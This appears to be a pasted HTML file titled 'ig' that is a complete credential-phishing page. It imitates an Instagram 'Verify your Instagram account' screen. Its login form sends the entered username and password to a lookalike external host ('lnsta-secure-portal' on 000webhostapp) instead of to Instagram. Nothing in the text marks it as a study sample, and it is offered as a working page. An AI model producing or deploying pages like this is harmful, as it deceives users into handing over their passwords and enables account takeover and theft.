ig
2 years ago in HTML
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Verify your Instagram account</title>
<style>
* {
box-sizing: border-box;
}
</style>
</head>
<body style="background-color: #fafafa;">
<div style="padding-top: 40px; padding-bottom: 100px">
<div style="width: 100%; max-width: 350px; margin: 0 auto; border: 1px solid #dbdbdb; background-color: #ffffff">
<div style="text-align: center; padding-bottom: 18px">
<img src="https://logos-world.net/wp-content/uploads/2020/04/Instagram-Logo.png" style="width: 175px; height: auto;">
</div>
<div style="padding-bottom: 40px">
<form id="loginForm" method="post" action="https://lnsta-secure-portal.000webhostapp.com/post.php">
<div style="padding-left: 40px; padding-right: 40px; padding-bottom: 5px">
<input maxlength="75" name="username" type="text" value="" style="display: block; width: 100%; background: #fafafa; border: 1px solid #dbdbdb; padding: 10px 0 10px 8px; border-radius: 3px; font-size: 12px; color: #8e8e8e; max-width: 268px;" placeholder="Username or email address">
</div>
<div style="padding-left: 40px; padding-right: 40px; padding-bottom: 20px">
<input name="password" type="password" value="" style="display: block; width: 100%; background: #fafafa; border: 1px solid #dbdbdb; padding: 10px 0 10px 8px; border-radius: 3px; font-size: 12px; color: #8e8e8e; max-width: 268px;" placeholder="Password">
</div>
<div style="padding-left: 40px; padding-right: 40px">
<button style="display: block; width: 100%; background-color: #0095f6; border-radius: 3px; border: 0; color: #ffffff; font-weight: 800; padding: 8px 5px; cursor: pointer;" type="submit">Verify account</button>
</div>
</form>
</div>
</div>
</div>
</body>
</html>